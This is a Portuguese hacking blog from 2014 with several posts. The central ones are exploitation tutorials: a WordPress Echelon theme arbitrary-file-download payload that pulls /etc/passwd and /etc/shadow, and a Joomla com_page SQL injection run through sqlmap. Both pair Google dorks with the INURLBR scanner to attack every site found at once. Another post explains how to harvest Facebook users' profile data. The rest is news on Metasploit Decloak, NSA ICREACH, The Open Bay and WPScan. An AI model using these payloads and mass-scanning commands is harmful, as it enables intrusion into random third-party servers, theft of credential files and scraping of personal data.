domingo, 28 de dezembro de 2014

TUTORIAL Capturing data facebook

TUTORIAL Capturing data facebook

Uma forma simples de pegar dados de usuários facebook
O perfil do alvo deve está parcialmente aberto ou você deve ser amigo do mesmo.
Nem todo perfil temo exito na extração.
--------------------------------------------------------------------------------------------
[TODA INFORMAÇÃO DEVE SER LIVRE]
[جميع المعلومات يجب أن تكون خالية]
[ALL INFORMATION MUST BE FREE]
/*
*/
--------------------------------------------------------------------------------------------

[PROFILE PHOTO]::
https://graph.facebook.com/{USER_OR_ID_USER}/picture?width=2000&height=2000
EX: https://graph.facebook.com/zuck/picture?width=2000&height=2000

[BASIC DATA]::
https://graph.facebook.com/{USER_OR_ID_USER}
 EX: https://graph.facebook.com/zuck
--------------------------------------------------------------------------------------------

[S C R I P T] = > INURL BRASIL / API Facebook Data Mining Utility :: http://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

 Description: The script captures uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo

 How to use php face.php {USER_OR_ID_USER}
 http://s21.postimg.org/re018qbvp/Untitled_4.jpg

REF:: http://pastebin.com/PMWXLmyp
--------------------------------------------------------------------------------------------

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



sábado, 20 de dezembro de 2014

Algorithm - The Hacker Movie

Um hacker de computador freelance invade contratante governo secreto e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.  Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.  Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.  MOTIVAÇÃO  No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.  UM MODELO DE NEGÓCIO DIFERENTE  O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.

Um hacker de computador freelance invade um sistema secreto do governo e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.
---------------------------------------------------------------

Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.

Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.

MOTIVAÇÃO

No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.

UM MODELO DE NEGÓCIO DIFERENTE

O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.


Dowload torrent:
https://kickass.so/algorithm-the-hacker-movie-2014-t9335412.html

Dowload  - MP4
http://srv52.clipconverter.cc/download/u87dg6iDraqwZGxum5qWaHJg5KWmqW5q4pSXaXJhmGhtZW20qc%2FMqHyf1qiZpa2d2A%3D%3D/ALGORITHM%3A%20The%20Hacker%20Movie.mp4

sexta-feira, 19 de dezembro de 2014

#SaveThePirateBay, crie e execute SEU PRÓPRIO Pirate Bay

SALVE, crie e execute SEU PRÓPRIO Pirate Bay - Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor tem o seguinte texto:  Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques. Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.   Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.  De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".  O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.  O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.


Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor e publica-lo, E tem o seguinte texto:

Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques.
Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.


Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.


De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".

O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.

O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.

:: BAIXAR PROJETO ::  https://github.com/isohuntto/openbay

:: BAIXAR PROJETO :: 
----------------------------------------------------------------------------------------

:: BAIXAR BANCO TORRENT ::   http://openbay.isohunt.to/files/openbay-db-dump.torrent

:: BAIXAR BANCO TORRENT :: 
O melhor conteúdo de torrent do Kick Ass Torrents, Isohunt.to e Pirate Bay para dar às pessoas o melhor e mais novo conteúdo.

----------------------------------------------------------------------------------------

Instalação
Passo 1. Download source.

Faça download da versão mais recente do engine em openbay.isohunt.to ou em página web do projeto GitHub.

Passo 2. Upload - Carregue a source escolhida na hospedagem.

A publicação é comum de qualquer outro código fonte basta usar o ftp ou painel cpanel/gerenciamento disponível.

Passo 3. Descompacte fonte de hospedagem pasta (opcional)

Este passo é completamente opcional. Depende do seu web hosting. Alguns hostings pode descompactar fontes automaticamente alguns deles permite que você faça-o manualmente.

Passo 4. Set ambiente de hospedagem (opcional)

Apache

Esta opção está disponível por padrão no pacote source original.
Você pode vê-lo em conf/example.htaccess

Nginx

Esta configuração está disponível no pacote fonte original em /conf/example.nginx.conf

Sphinx (modo avançado)
https://github.com/isohuntto/openbay/wiki/sphinx

MySQL (modo avançado)
Antes executar, você precisa criar uma base de dados, o esquema da base de dados será criado pelo assistente. Dump SQL caminho:  /src/protected/data/schema.mysql.sql

Passo 5. prosseguindo 

Parabéns! Agora você pode abrir o seu nome de domínio com qualquer navegador e siga o guia fornecida lá. Como padrão, você terá que colocar o título da página que vai aparecer em todas as suas páginas.

Instruções detalhadas aqui
https://github.com/isohuntto/openbay/wiki/shared-hosting-guide


Apache > = 2. *
PHP versão > = 5,3, com os módulos instalados: DOP, PDO_MYSQL
Qualquer nome de domínio
Engine Sphinx > = 2,1
MySQL > = 5. *

quinta-feira, 18 de dezembro de 2014

FBI usa Metasploit Decloak Para expor os usuários TOR.

Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.  A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR. Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH Para ser executado lado cliente."


Metasploit, uma criação de um hacker(H.D. Moore)  white hat em 2003, foi o mais procuradoa ferramenta de hacking por quase uma década; uma espécie de canivete suíço de hacks que permite que um hacker vasculhe  redes de clientes.

A ferramenta é tão útil  que até mesmo FBI não poderia ficar longe dela. De acordo com um relatório recente da WIRED, FBI usou um código Flash a partir de um projeto paralelo Metasploit abandonado "Decloaking Engine" para identificar os suspeitos que se escondem atrás do anonimato da rede TOR.
Decloaking Engine - "Esta ferramenta demonstra um sistema que identifica o endereço IP real de um usuário da web, independentemente das configurações de proxy, usando uma combinação de tecnologias do lado do cliente e serviços personalizados, Usa como componentes JAVA e FLASH
Para ser executado lado cliente."


JAVA::    https://web.archive.org/web/20110314002349/http://decloak.net/HelloWorld.java
FLASH:https://web.archive.org/web/20110723083748/http://decloak.net/Decloak.hx

A ferramenta foi utilizada em "Operation Torpedo", uma operação policial visando três usuários dos sites da DarkNet/DW de pornografia infantil. Um advogado de um dos réus está agora desafiando a confiabilidade do hackerware como uma evidência científica admissível no Supremo Tribunal Federal.

O assunto será tratado em tribunal em 23 de fevereiro de 2015.

Tor, um projeto livre, de código aberto, é um software de anonimato que protege os usuários por roteamento de tráfego por meio de conexões criptografadas. Ele é bastante popular entre os criminosos, ativistas de direitos humanos, ativistas, jornalistas, hacking e denunciantes.
O software processa um servidor web inútil para as autoridades de aplicação da lei, porque enfatiza a informação muito limitada sobre um usuário para o nó Tor mais próximo.

Metasploit, criado em 2003, é um open-source ferramenta de teste de penetração que permite aos usuários organizar e efetuar ataques de componentes. Mais tarde, em 2006, Moore lançou o "Metasploit Decloaking Engine," Com cinco truques, para romper sistemas de anonimato.
No entanto, qualquer erro exporia a identidade do utilizador.

Decloaking Engine, como implantação de spyware, é bastante leve e foi usado contra cada visitante do site, um caso de implantação de spyware em massa. A Conferência Judicial dos Estados Unidos está trabalhando em uma petição do Departamento de Justiça para permitir explicitamente implantações de spyware.

Enquanto isso está acontecendo, capacidades anti-tor do FBI realmente melhoraram de forma alarmante.

"No curso de nove meses, eles foram de fora as técnicas de Flash que simplesmente se aproveitam da falta de proteção proxy, para explorações do navegador custom-built", diz Chris Soghoian, principal tecnólogo na ACLU.

http://hackread.com/fbi-used-metasploit-decloak-expose-tor-users/

quarta-feira, 17 de dezembro de 2014

NSA tem o seu próprio motor de busca de metadados


NSA tem o seu próprio motor de busca de metadados
NSA supostamente desenvolveu um motor de busca para procurar metadados e compartilhá-lo com outras agências governamentais americanas, incluindo o FBI e DEA. O Intercept informou que com base nos documentos vazados do denunciante Edward Snowden.

O motor de busca tem ICREACH(Seu nome é baseado no acrônimo para a Intelligence Community Reach) e é capaz de pesquisar através de 860.000.000.000 entradas de dados sobre chamadas telefônicas, e-mails, faxes, mensagens de texto, locais de telefone celular e conversas de bate-papo on-line. Mais de 1.000 analistas e 23 agências governamentais têm acesso ao motor de busca.

ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


ICREACH foi projetado para ser adequado para a partilha dos dados secretos de vigilância nos EUA e é capaz de lidar com 2-5000000000 novas entradas de dados todos os dias. As informações coletadas, o que é essencialmente derivada de comunicações estrangeiras de vigilância, é composto por mais de 30 tipos diferentes de metadados. Especialistas legais estão alarmados com o tamanho do motor de busca e temem que as informações sejam utilizado para investigações não-relacionados com o terrorismo, que não é muita novidade para o cenário  investigativo NSA.


Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

Revelações anteriores que tem origem nos documentos Snowden expuseram uma infinidade de programas da NSA para que recolhem grandes volumes de comunicações. A NSA reconheceu que compartilha alguns de seus dados coletados com agências nacionais, como o FBI, mas os detalhes sobre o método e seu âmbito de partilha permaneceram envolto em segredo.

ICREACH tem sido acessível a mais de 1.000 analistas em 23 agências do governo dos EUA que realizam trabalho de inteligência, de acordo com um memorando de 2010. Um documento de planejamento a partir de 2007 lista o DEA, FBI, CIA e da Agência de Inteligência de Defesa, como membros do núcleo. Informação divulgada através ICREACH pode ser usado para rastrear os movimentos de pessoas, mapear suas redes de associados, ajudar a prever ações futuras e potencialmente revelar afiliações religiosas ou convicções políticas.

A criação do ICREACH representou um momento marcante na história da das classificadas redes de vigilância do governo dos EUA, de acordo com os documentos da NSA.

Em uma declaração sobre as interceptações, o Escritório do Diretor de Inteligência Nacional USA confirmou que os dados do sistema que é varrido por programas autorizados nos termos da Ordem Executiva 12333, uma directiva presidencial controversa Reagan-era que sustenta várias operações de vigilância em massa da NSA que monitoram comunicações no exterior. A vigilância 12333 ocorre sem supervisão judicial e recebeu escrutínio do Congresso mínima porque ele é direcionado a, redes de comunicação estrangeiros, não domésticos. Mas a ampla escala de 12333 vigilância significa que as comunicações alguns americanos pegos na varredura.

Referencias:
http://fr.wikipedia.org/wiki/ICREACH
http://blog.scanarch.com/nsa-has-its-own-search-engine-for-metadata/
https://firstlook.org/theintercept/2014/08/25/icreach-nsa-cia-secret-google-crisscross-proton/

INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all

Joomla Component com_page - SQL Injection
INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --comand-all
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]: 
intext:option=com_page
--------------------------------------------------------------------------------------

Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.

Logica de processo:
  1. BUSCAR ALVOS EM MOTORES DE BUSCA.
  2. RETIRAR URLS INDESEJADAS.
  3. RETIRAR DUPLICATAS.
  4. CONVERTER VALORES EM UM ARRAY DE DADOS.
  5. ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
  6. ANALISAR ERROS PADRÕES OU PERSONALIZAS.
  7. SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL) 
  8. ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.

Usando SCANNER INURLBR:
Comando->{

Exmplo:
./inurlbr.php 
--dork 'YOUR_DORK' 
-s OUTPUT.txt  
-q  {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'

Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
      Exemplo: --command-vul {comando}
      Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
               --command-vul './exploit.sh _TARGET_ output.txt'

  --command-all Utilize este comand para especificar um único comando a cada URL encontrado.
      Exemplo: --command-all {comando}
      Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
               --command-all './exploit.sh _TARGET_ output.txt'

observação:

     _TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br

    _TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste

Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

RESULTADO:
Observação parâmetro --comand-all: Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca. Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP, O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

}


Referencias

terça-feira, 16 de dezembro de 2014

Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download

EXPLOIT Wordpress A.F.D Theme Echelon
EXPLOIT Wordpress A.F.D Theme Echelon Explorando tema Echelon do wordpress falha Arbitrary File Download
Explorando tema Echelon do wordpress falha Arbitrary File Download

# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.

A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php

Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download

Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e  /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:
------------------------------------------------------------------------------------------------
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
------------------------------------------------------------------------------------------------

Exploração:

Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:
php exploit.php http://alvo


Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!

Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"

Explicando comando:

--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Resultado execução:
 Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!


Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon

Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

sexta-feira, 12 de dezembro de 2014

WPScan DB & WPScan software

Conheça o WPScan Vulnerability Database  criado por Ryan Dewhurst @ethicalhack3r

Conheça o WPScan Vulnerability Database 
criado por Ryan Dewhurst @ethicalhack3r

WPScan é uma Open Source black box scanner de vulnerabilidade WordPress Open Source.
WPScan é escrito em Ruby, a primeira versão do WPScan foi lançado no dia 16 de junho de 2011. Hoje WPScan é mantido pela Equipe WPScan e outros contribuidores Open Source. Se você gostaria de usar e / ou contribuir para WPScan você pode fazê-lo a partir do repositório
Github - https://github.com/wpscanteam/wpscan/ WPScan é uma Open Source black box scanner de vulnerabilidade WordPress Open Source.  WPScan é escrito em Ruby, a primeira versão do WPScan foi lançado no dia 16 de junho de 2011. Hoje WPScan é mantido pela Equipe WPScan e outros contribuidores Open Source. Se você gostaria de usar e / ou contribuir para WPScan você pode fazê-lo a partir do repositório

Github - https://github.com/wpscanteam/wpscan/

WPScan Vulnerability Database
O WPScan Vulnerability Database é uma versão navegável on-line de arquivos de dados do WPScan que são usados para detectar conhecido WordPress núcleo, plugins e temas vulnerabilidades.  Esta base de dados foi elaborado pela Equipe WPScan e vários outros contribuidores Open Source desde o lançamento do WPScan. O desenvolvimento da Vulnerabilidade WPScan banco de dados foi financiado pelo projeto 5by5 de BruCON.

O WPScan Vulnerability Database é uma versão navegável on-line de arquivos de dados do WPScan que são usados para detectar conhecido WordPress núcleo, plugins e temas vulnerabilidades.
Esta base de dados foi elaborado pela Equipe WPScan e vários outros contribuidores Open Source desde o lançamento do WPScan. O desenvolvimento da Vulnerabilidade WPScan banco de dados foi financiado pelo projeto 5by5 de BruCON.

Fora a versão navegável existe o próprio WPscan que analisa tais vulnerabilidades(http://wpscan.org/)

WPScan vem pré-instalado nos seguintes distribuições Linux:

  1. backbox Linux
  2. Kali Linux
  3. Pentoo
  4. SamuraiWTF
  5. ArchAssault

Prerequisites:


  1. Ruby >= 1.9.2 - Recommended: 2.1.4
  2. Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
  3. RubyGems - Recommended: latest
  4. Git
DEMONSTRAÇÃO DE USO BRUTE FORCE:

ENUMERAÇÃO DE DADOS:

Installing on Ubuntu:

Before Ubuntu 14.04:

sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test

Installing on Debian:

sudo apt-get install git ruby ruby-dev libcurl4-gnutls-dev make
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler
bundle install --without test --path vendor/bundle
Installing on Fedora:

sudo yum install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test

Installing on Archlinux:

pacman -Syu ruby
pacman -Syu libyaml
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
gem install typhoeus
gem install nokogiri